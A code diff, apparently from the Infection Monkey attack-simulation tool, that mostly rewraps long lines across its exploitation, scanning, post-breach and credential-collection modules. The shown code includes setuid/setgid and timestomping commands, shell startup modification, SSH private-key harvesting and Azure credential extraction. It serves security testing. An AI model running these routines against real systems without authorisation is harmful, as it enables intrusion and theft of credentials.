if exploiter.RUNS_AGENT_ON_SUCCESS:
break # if adding machine to exploited, won't try other exploits on it
break # if adding machine to exploited, won't try other exploits
# on it
if not host_exploited:
self._fail_exploitation_machines.add(machine)
VictimHostTelem("T1210", ScanStatus.SCANNED, machine=machine).send()
@ -244,12 +246,14 @@ class InfectionMonkey(object):
elif not WormConfiguration.alive:
LOG.info("Marked not alive from configuration")
# if host was exploited, before continue to closing the tunnel ensure the exploited host had its chance to
# if host was exploited, before continue to closing the tunnel ensure the exploited
# host had its chance to
# connect to the tunnel
if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info(
"Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
"Sleeping %d seconds for exploited machines to connect to tunnel",
time_to_sleep
)
time.sleep(time_to_sleep)
@ -261,7 +265,8 @@ class InfectionMonkey(object):
except PlannedShutdownException:
LOG.info(
"A planned shutdown of the Monkey occurred. Logging the reason and finishing execution."
"A planned shutdown of the Monkey occurred. Logging the reason and finishing "
"execution."
)
LOG.exception("Planned shutdown, reason:")
@ -393,7 +398,8 @@ class InfectionMonkey(object):
return True
else:
LOG.info(
"Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
"Failed exploiting %r with exploiter %s", machine,
exploiter.__class__.__name__
)
except ExploitingVulnerableMachineError as exc:
LOG.error(
@ -452,7 +458,8 @@ class InfectionMonkey(object):
"""
if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException(
"Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
"Monkey couldn't find server with {} default tunnel.".format(
self._default_tunnel)
)
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)

View File

@ -52,6 +52,7 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
@ -59,10 +60,12 @@ if is_windows_os():
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")
@ -88,7 +91,8 @@ else:
continue
try:
ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", iff))
except IOError: # interface is present in routing tables but does not have any assigned IP
except IOError: # interface is present in routing tables but does not have any
# assigned IP
ifaddr = "0.0.0.0"
else:
addrfamily = struct.unpack("h", ifreq[16:18])[0]

View File

@ -49,22 +49,21 @@ class MSSQLFinger(HostFinger):
data, server = sock.recvfrom(self.BUFFER_SIZE)
except socket.timeout:
LOG.info(
"Socket timeout reached, maybe browser service on host: {0} doesnt exist".format(
host
)
"Socket timeout reached, maybe browser service on host: {0} doesnt "
"exist".format(host)
)
sock.close()
return False
except socket.error as e:
if e.errno == errno.ECONNRESET:
LOG.info(
"Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.".format(
host
)
"Connection was forcibly closed by the remote host. The host: {0} is "
"rejecting the packet.".format(host)
)
else:
LOG.error(
"An unknown socket error occurred while trying the mssql fingerprint, closing socket.",
"An unknown socket error occurred while trying the mssql fingerprint, "
"closing socket.",
exc_info=True,
)
sock.close()
@ -82,7 +81,8 @@ class MSSQLFinger(HostFinger):
if len(instance_info) > 1:
host.services[self._SCANNED_SERVICE][instance_info[1]] = {}
for i in range(1, len(instance_info), 2):
# Each instance's info is nested under its own name, if there are multiple instances
# Each instance's info is nested under its own name, if there are multiple
# instances
# each will appear under its own name
host.services[self._SCANNED_SERVICE][instance_info[1]][
instance_info[i - 1]

View File

@ -44,9 +44,11 @@ class NetworkScanner(object):
def _get_inaccessible_subnets_ips(self):
"""
For each of the machine's IPs, checks if it's in one of the subnets specified in the
'inaccessible_subnets' config value. If so, all other subnets in the config value shouldn't be accessible.
'inaccessible_subnets' config value. If so, all other subnets in the config value
shouldn't be accessible.
All these subnets are returned.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is running on.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is
running on.
"""
subnets_to_scan = []
if len(WormConfiguration.inaccessible_subnets) > 1:
@ -54,7 +56,8 @@ class NetworkScanner(object):
if NetworkScanner._is_any_ip_in_subnet(
[str(x) for x in self._ip_addresses], subnet_str
):
# If machine has IPs from 2 different subnets in the same group, there's no point checking the other
# If machine has IPs from 2 different subnets in the same group, there's no
# point checking the other
# subnet.
for other_subnet_str in WormConfiguration.inaccessible_subnets:
if other_subnet_str == subnet_str:
@ -74,9 +77,12 @@ class NetworkScanner(object):
:param stop_callback: A callback to check at any point if we should stop scanning
:return: yields a sequence of VictimHost instances
"""
# We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be the best decision
# However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (pps and bw)
# Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size
# We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be
# the best decision
# However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (
# pps and bw)
# Because we are using this to spread out IO heavy tasks, we can probably go a lot higher
# than CPU core size
# But again, balance
pool = Pool(ITERATION_BLOCK_SIZE)
victim_generator = VictimHostGenerator(

View File

@ -59,7 +59,8 @@ class PingScanner(HostScanner, HostFinger):
ttl = int(regex_result.group(0))
if ttl <= LINUX_TTL:
host.os["type"] = "linux"
else: # as far we we know, could also be OSX/BSD but lets handle that when it comes up.
else: # as far we we know, could also be OSX/BSD but lets handle that when it
# comes up.
host.os["type"] = "windows"
host.icmp = True

View File

@ -51,12 +51,14 @@ class PostgreSQLFinger(HostFinger):
self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT)
host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = (
"The PostgreSQL server was unexpectedly accessible with the credentials - "
+ f"user: '{self.CREDS['username']}' and password: '{self.CREDS['password']}'. Is this a honeypot?"
+ f"user: '{self.CREDS['username']}' and password: '"
f"{self.CREDS['password']}'. Is this a honeypot?"
)
return True
except psycopg2.OperationalError as ex:
# try block will throw an OperationalError since the credentials are wrong, which we then analyze
# try block will throw an OperationalError since the credentials are wrong, which we
# then analyze
try:
exception_string = str(ex)

View File

@ -68,14 +68,16 @@ class SMBNegoFingerData(Packet):
("separator1", b"\x02"),
(
"dialect1",
b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00",
b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d"
b"\x20\x31\x2e\x30\x00",
),
("separator2", b"\x02"),
("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("separator3", b"\x02"),
(
"dialect3",
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72"
b"\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
),
("separator4", b"\x02"),
("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
@ -104,12 +106,18 @@ class SMBSessionFingerData(Packet):
("bcc1", ""),
(
"Data",
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c"
b"\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00"
b"\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53"
b"\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20"
b"\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
b"\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00",
),
]

View File

@ -22,7 +22,8 @@ class TcpScanner(HostScanner, HostFinger):
def get_host_fingerprint(self, host, only_one_port=False):
"""
Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration.
Scans a target host to see if it's alive using the tcp_target_ports specified in the
configuration.
:param host: VictimHost structure
:param only_one_port: Currently unused.
:return: T/F if there is at least one open port.

View File

@ -129,7 +129,8 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
possible_ports.append((port, sock))
continue
if err == 10035: # WSAEWOULDBLOCK is valid, see
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms740668%28v=vs.85%29.aspx?f=255&MSPPError=-2147217396
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms740668%28v=vs.85%29
# .aspx?f=255&MSPPError=-2147217396
possible_ports.append((port, sock))
continue
if err == 115: # EINPROGRESS 115 /* Operation now in progress */
@ -164,7 +165,8 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
readable_sockets, _, _ = select.select(
[s[1] for s in connected_ports_sockets], [], [], 0
)
# read first BANNER_READ bytes. We ignore errors because service might not send a decodable byte string.
# read first BANNER_READ bytes. We ignore errors because service might not send a
# decodable byte string.
banners = [
sock.recv(BANNER_READ).decode(errors="ignore")
if sock in readable_sockets
@ -209,7 +211,8 @@ def _get_traceroute_bin_path():
Its been built using the buildroot utility with the following settings:
* Statically link to musl and all other required libs
* Optimize for size
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure it behaves as expected
This is done because not all linux distros come with traceroute out-of-the-box, and to ensure
it behaves as expected
:return: Path to traceroute executable
"""
@ -223,7 +226,8 @@ def _parse_traceroute(output, regex, ttl):
:param regex: Regex for finding an IP address
:param ttl: Max TTL. Must be the same as the TTL used as param for traceroute.
:return: List of ips which are the hops on the way to the traceroute destination.
If a hop's IP wasn't found by traceroute, instead of an IP, the array will contain None
If a hop's IP wasn't found by traceroute, instead of an IP, the array will
contain None
"""
ip_lines = output.split("\n")
trace_list = []

View File

@ -27,7 +27,8 @@ logger = logging.getLogger(__name__)
class CommunicateAsNewUser(PBA):
"""
This PBA creates a new user, and then creates HTTPS requests as that user. This is used for a Zero Trust test of the
This PBA creates a new user, and then creates HTTPS requests as that user. This is used for a
Zero Trust test of the
People pillar. See the relevant telemetry processing to see what findings are created.
"""
@ -58,7 +59,8 @@ class CommunicateAsNewUser(PBA):
def get_commandline_for_http_request(url, is_windows=is_windows_os()):
if is_windows:
format_string = (
'powershell.exe -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; '
'powershell.exe -command "[Net.ServicePointManager]::SecurityProtocol = ['
"Net.SecurityProtocolType]::Tls12; "
'Invoke-WebRequest {url} -UseBasicParsing"'
)
else:
@ -79,7 +81,8 @@ class CommunicateAsNewUser(PBA):
"""
if exit_status == 0:
PostBreachTelem(
self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
self,
(CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
).send()
else:
PostBreachTelem(

View File

@ -9,5 +9,6 @@ class AccountDiscovery(PBA):
def __init__(self):
linux_cmds, windows_cmds = get_commands_to_discover_accounts()
super().__init__(
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds),
windows_cmd=windows_cmds
)

View File

@ -28,7 +28,8 @@ class SignedScriptProxyExecution(PBA):
super().run()
except Exception as e:
LOG.warning(
f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}"
f"An exception occurred on running PBA "
f"{POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}"
)
finally:
cleanup_changes(original_comspec)

View File

@ -1,7 +1,9 @@
SCHEDULED_TASK_NAME = "monkey-spawn-cmd"
SCHEDULED_TASK_COMMAND = r"C:\windows\system32\cmd.exe"
# Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
# Commands from: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005
# /T1053.005.md
def get_windows_commands_to_schedule_jobs():

View File

@ -16,7 +16,8 @@ __author__ = "VakarisZ"
class PBA(Plugin):
"""
Post breach action object. Can be extended to support more than command execution on target machine.
Post breach action object. Can be extended to support more than command execution on target
machine.
"""
@staticmethod
@ -61,7 +62,8 @@ class PBA(Plugin):
result = exec_funct()
if self.scripts_were_used_successfully(result):
T1064Telem(
ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action."
ScanStatus.USED,
f"Scripts were used to execute {self.name} post breach action."
).send()
PostBreachTelem(self, result).send()
else:

View File

@ -1,11 +1,14 @@
TEMP_FILE = "$HOME/monkey-temp-file"
# Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md
# Commands from https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001
# /T1548.001.md
def get_linux_commands_to_setuid_setgid():
return [
f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s {TEMP_FILE} &&",
f"touch {TEMP_FILE} && chown root {TEMP_FILE} && chmod u+s {TEMP_FILE} && chmod g+s "
f"{TEMP_FILE} &&",
'echo "Successfully changed setuid/setgid bits" &&',
f"rm {TEMP_FILE}",
]

View File

@ -1,7 +1,9 @@
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import (
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification\
import (
get_linux_commands_to_modify_shell_startup_files,
)
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import (
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification\
import (
get_windows_commands_to_modify_shell_startup_files,
)

View File

@ -19,13 +19,15 @@ def get_windows_commands_to_modify_shell_startup_files():
STARTUP_FILES_PER_USER = [
"\\".join(
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [
user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
)
for user in USERS
]
return [
"powershell.exe",
"infection_monkey/post_breach/shell_startup_files/windows/modify_powershell_startup_file.ps1",
"infection_monkey/post_breach/shell_startup_files/windows"
"/modify_powershell_startup_file.ps1",
"-startup_file_path {0}",
], STARTUP_FILES_PER_USER

View File

@ -75,7 +75,6 @@ def test_command_windows_custom_file_and_cmd(
@pytest.fixture
def mock_UsersPBA_linux_custom_file(set_os_linux, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd", None)
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.PBA_linux_filename",
@ -91,7 +90,6 @@ def test_command_linux_custom_file(mock_UsersPBA_linux_custom_file):
@pytest.fixture
def mock_UsersPBA_windows_custom_file(set_os_windows, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr("infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd", None)
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.PBA_windows_filename",
@ -107,7 +105,6 @@ def test_command_windows_custom_file(mock_UsersPBA_windows_custom_file):
@pytest.fixture
def mock_UsersPBA_linux_custom_cmd(set_os_linux, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.custom_PBA_linux_cmd",
CUSTOM_LINUX_CMD,
@ -123,7 +120,6 @@ def test_command_linux_custom_cmd(mock_UsersPBA_linux_custom_cmd):
@pytest.fixture
def mock_UsersPBA_windows_custom_cmd(set_os_windows, fake_monkey_dir_path, monkeypatch):
monkeypatch.setattr(
"infection_monkey.config.WormConfiguration.custom_PBA_windows_cmd",
CUSTOM_WINDOWS_CMD,

View File

@ -10,5 +10,5 @@ def get_linux_timestomping_commands():
f"rm {TEMP_FILE} -f"
]
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -4,5 +4,5 @@ TEMP_FILE = "monkey-timestomping-file.txt"
def get_windows_timestomping_commands():
return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1"
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -1,5 +1,6 @@
def get_linux_trap_commands():
return [
"trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;", # trap and send SIGINT signal
"trap 'echo \"Successfully used trap command\"' INT && kill -2 $$ ;",
# trap and send SIGINT signal
"trap - INT", # untrap SIGINT
]

View File

@ -6,7 +6,8 @@ __author__ = "itay.mizeretz"
def get_binaries_dir_path():
"""
Gets the path to the binaries dir (files packaged in pyinstaller if it was used, infection_monkey dir otherwise)
Gets the path to the binaries dir (files packaged in pyinstaller if it was used,
infection_monkey dir otherwise)
:return: Binaries dir path
"""
if getattr(sys, "frozen", False):

View File

@ -72,7 +72,8 @@ class SSHCollector(object):
try:
with open(public) as f:
info["public_key"] = f.read()
# By default private key has the same name as public, only without .pub
# By default private key has the same name as public,
# only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
@ -83,7 +84,8 @@ class SSHCollector(object):
info["private_key"] = private_key
LOG.info("Found private key in %s" % private)
T1005Telem(
ScanStatus.USED, "SSH key", "Path: %s" % private
ScanStatus.USED, "SSH key",
"Path: %s" % private
).send()
else:
continue

View File

@ -29,7 +29,8 @@ class OperatingSystem(IntEnum):
class SystemInfoCollector(object):
"""
A class that checks the current operating system and calls system information collecting modules accordingly
A class that checks the current operating system and calls system information collecting
modules accordingly
"""
def __init__(self):
@ -113,5 +114,6 @@ class InfoCollector(object):
self.info["Azure"] = {}
self.info["Azure"]["usernames"] = [cred[0] for cred in azure_creds]
except Exception:
# If we failed to collect azure info, no reason to fail all the collection. Log and continue.
# If we failed to collect azure info, no reason to fail all the collection. Log and
# continue.
LOG.error("Failed collecting Azure info.", exc_info=True)

View File

@ -97,7 +97,8 @@ class AzureCollector(object):
# we're going to do as much of this in PS as we can.
ps_block = ";\n".join(
[
'[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | Out-Null',
'[System.Reflection.Assembly]::LoadWithPartialName("System.Security") | '
"Out-Null",
'$base64 = "%s"' % protected_data,
"$content = [Convert]::FromBase64String($base64)",
"$env = New-Object Security.Cryptography.Pkcs.EnvelopedCms",

View File

@ -37,7 +37,8 @@ class ProcessListCollector(SystemInfoCollector):
"full_image_path":process.exe(),
}
except (psutil.AccessDenied, WindowsError):
# we may be running as non root and some processes are impossible to acquire in Windows/Linux.
# we may be running as non root and some processes are impossible to acquire in
# Windows/Linux.
# In this case we'll just add what we know.
processes[process.pid] = {
"name":"null",

View File

@ -1,4 +1,5 @@
# Inspired by Giampaolo Rodola's psutil example from https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
# Inspired by Giampaolo Rodola's psutil example from
# https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
import logging
import socket

View File

@ -7,9 +7,12 @@ from infection_monkey.utils.plugins.plugin import Plugin
class SystemInfoCollector(Plugin, metaclass=ABCMeta):
"""
ABC for system info collection. See system_info_collector_handler for more info. Basically, to implement a new system info
collector, inherit from this class in an implementation in the infection_monkey.system_info.collectors class, and override
the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the collector to the configuration
ABC for system info collection. See system_info_collector_handler for more info. Basically,
to implement a new system info
collector, inherit from this class in an implementation in the
infection_monkey.system_info.collectors class, and override
the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the
collector to the configuration
as well - see monkey_island.cc.services.processing.system_info_collectors for examples.
See the Wiki page "How to add a new System Info Collector to the Monkey?" for a detailed guide.

View File

@ -24,9 +24,8 @@ class SystemInfoCollectorsHandler(object):
# If we failed one collector, no need to stop execution. Log and continue.
LOG.error("Collector {} failed. Error info: {}".format(collector.name, e))
LOG.info(
"All system info collectors executed. Total {} executed, out of which {} collected successfully.".format(
len(self.collectors_list), successful_collections
)
"All system info collectors executed. Total {} executed, out of which {} "
"collected successfully.".format(len(self.collectors_list), successful_collections)
)
SystemInfoTelem({"collectors":system_info_telemetry}).send()

View File

@ -56,7 +56,8 @@ class TestPypykatzHandler(TestCase):
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
@ -64,7 +65,8 @@ class TestPypykatzHandler(TestCase):
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
@ -72,7 +74,8 @@ class TestPypykatzHandler(TestCase):
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
@ -80,7 +83,8 @@ class TestPypykatzHandler(TestCase):
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,

View File

@ -44,7 +44,8 @@ class WindowsSystemSingleton(_SystemSingleton):
if not handle:
LOG.error(
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name,
last_error
)
return False
if winerror.ERROR_ALREADY_EXISTS == last_error:

View File

@ -3,7 +3,8 @@ from infection_monkey.telemetry.attack.usage_telem import AttackTelem
class T1064Telem(AttackTelem):
def __init__(self, status, usage):
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
# techniques
"""
T1064 telemetry.
:param status: ScanStatus of technique

View File

@ -5,7 +5,8 @@ __author__ = "itay.mizeretz"
class T1197Telem(VictimHostTelem):
def __init__(self, status, machine, usage):
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
# techniques
"""
T1197 telemetry.
:param status: ScanStatus of technique

View File

@ -9,6 +9,7 @@ LOGGED_DATA_LENGTH = 300 # How many characters of telemetry data will be logged
__author__ = "itay.mizeretz"
# TODO: Rework the interface for telemetry; this class has too many responsibilities
# (i.e. too many reasons to change):
#

View File

@ -173,7 +173,8 @@ class MonkeyTunnel(Thread):
LOG.info("Stopping tunnel, waiting for clients: %s" % repr(self._clients))
# wait till all of the tunnel clients has been disconnected, or no one used the tunnel in QUIT_TIMEOUT seconds
# wait till all of the tunnel clients has been disconnected, or no one used the tunnel in
# QUIT_TIMEOUT seconds
while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT):
try:
search, address = self._broad_sock.recvfrom(BUFFER_READ)

View File

@ -8,8 +8,10 @@ class AutoNewUser(metaclass=abc.ABCMeta):
"""
RAII object to use for creating and using a new user. Use with `with`.
User will be created when the instance is instantiated.
User will be available for use (log on for Windows, for example) at the start of the `with` scope.
User will be removed (deactivated and deleted for Windows, for example) at the end of said `with` scope.
User will be available for use (log on for Windows, for example) at the start of the `with`
scope.
User will be removed (deactivated and deleted for Windows, for example) at the end of said
`with` scope.
Example:
# Created # Logged on

View File

@ -5,13 +5,15 @@ from infection_monkey.utils.windows.users import AutoNewWindowsUser
def create_auto_new_user(username, password, is_windows=is_windows_os()):
"""
Factory method for creating an AutoNewUser. See AutoNewUser's documentation for more information.
Factory method for creating an AutoNewUser. See AutoNewUser's documentation for more
information.
Example usage:
with create_auto_new_user(username, PASSWORD) as new_user:
...
:param username: The username of the new user.
:param password: The password of the new user.
:param is_windows: If True, a new Windows user is created. Otherwise, a Linux user is created. Leave blank for
:param is_windows: If True, a new Windows user is created. Otherwise, a Linux user is
created. Leave blank for
automatic detection.
:return: The new AutoNewUser object - use with a `with` scope.
"""

View File

@ -14,7 +14,8 @@ def get_linux_commands_to_add_user(username):
"-M", # Do not create homedir
"--expiredate", # The date on which the user account will be disabled.
datetime.datetime.today().strftime("%Y-%m-%d"),
"--inactive", # The number of days after a password expires until the account is permanently disabled.
"--inactive",
# The number of days after a password expires until the account is permanently disabled.
"0", # A value of 0 disables the account as soon as the password has expired
"-c", # Comment
"MONKEY_USER", # Comment

View File

@ -47,12 +47,14 @@ class AutoNewWindowsUser(AutoNewUser):
import win32security
try:
# Logon as new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera
# Logon as new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf
# -winbase-logonusera
self.logon_handle = win32security.LogonUser(
self.username,
".", # Use current domain.
self.password,
win32con.LOGON32_LOGON_INTERACTIVE, # Logon type - interactive (normal user), since we're using a shell.
win32con.LOGON32_LOGON_INTERACTIVE,
# Logon type - interactive (normal user), since we're using a shell.
win32con.LOGON32_PROVIDER_DEFAULT,
) # Which logon provider to use - whatever Windows offers.
except Exception as err:
@ -80,12 +82,17 @@ class AutoNewWindowsUser(AutoNewUser):
thread_handle = proc_info.hThread
logger.debug(
"Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS)
"Waiting for process to finish. Timeout: {}ms".format(
WAIT_TIMEOUT_IN_MILLISECONDS)
)
# https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f-408d2a41750d/what-events-on-a-process-handle-signal-satisify-waitforsingleobject?forum=vcgeneral
# Ignoring return code, as we'll use `GetExitCode` to determine the state of the process later.
_ = win32event.WaitForSingleObject( # Waits until the specified object is signaled, or time-out.
# https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f
# -408d2a41750d/what-events-on-a-process-handle-signal-satisify-waitforsingleobject
# ?forum=vcgeneral
# Ignoring return code, as we'll use `GetExitCode` to determine the state of the
# process later.
_ = win32event.WaitForSingleObject(
# Waits until the specified object is signaled, or time-out.
process_handle, # Ping process handle
WAIT_TIMEOUT_IN_MILLISECONDS, # Timeout in milliseconds
)

View File

@ -46,7 +46,8 @@ class WindowsUpgrader(object):
)
monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {"monkey_path": WormConfiguration.dropper_target_path_win_64}
MONKEY_CMDLINE_WINDOWS % {
